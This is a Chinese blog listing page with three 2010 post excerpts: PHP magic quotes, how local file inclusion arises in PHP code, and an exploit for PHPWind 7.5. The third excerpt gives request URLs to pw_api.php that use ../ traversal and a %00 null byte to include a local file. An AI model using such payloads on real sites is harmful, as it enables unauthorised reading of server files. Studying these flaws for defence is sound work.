- 博客(3)
- 资源 (1)
- 收藏
- 关注
原创 魔术符号
什么是魔术引号当打开时,所有的 (单引号),"(双引号),/(反斜线)和 NULL 字符都会被自动加上一个反斜线进行转义。这和 addslashes() 作用完全相同。一共有三个魔术引号指令:magic_quotes_gpc 影响到 HTTP 请求数据(GET,POST 和 COOKIE)。不能在运行时改变。在 PHP 中默认值为 on。 参见 get_magic_quot
2010-02-23 17:49:00 1150
原创 文件包含漏洞
1、如果类似于如下:require_once(R_P.api/class_ . $mode . .php);并且$mode可来源于用户的输入,如$_GET, $_REQUEST, $_POST等,且没有对这个输入进行检查和过滤,则存在文件包含漏洞。对文件路径作了一些限制,这样,不能用http://.../a.php之类的作为$mode的参数值,因此只存在本地文件包含漏洞。
2010-02-23 17:35:00 455
原创 PHPWind7.5多个文件包含漏洞的exploit
尝试发送以下URL,能实现本地文件包含渗透。http://10.20.61.88/phpWind7.5/pw_api.php?type=uc&sig=8c6e45dcfae660037c05f0cd1a15695b&mode=../../../../../../../../test.txt%00http://10.20.61.88/phpWind7.5/pw_api.php?type=uc
2010-02-23 17:27:00 2000
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人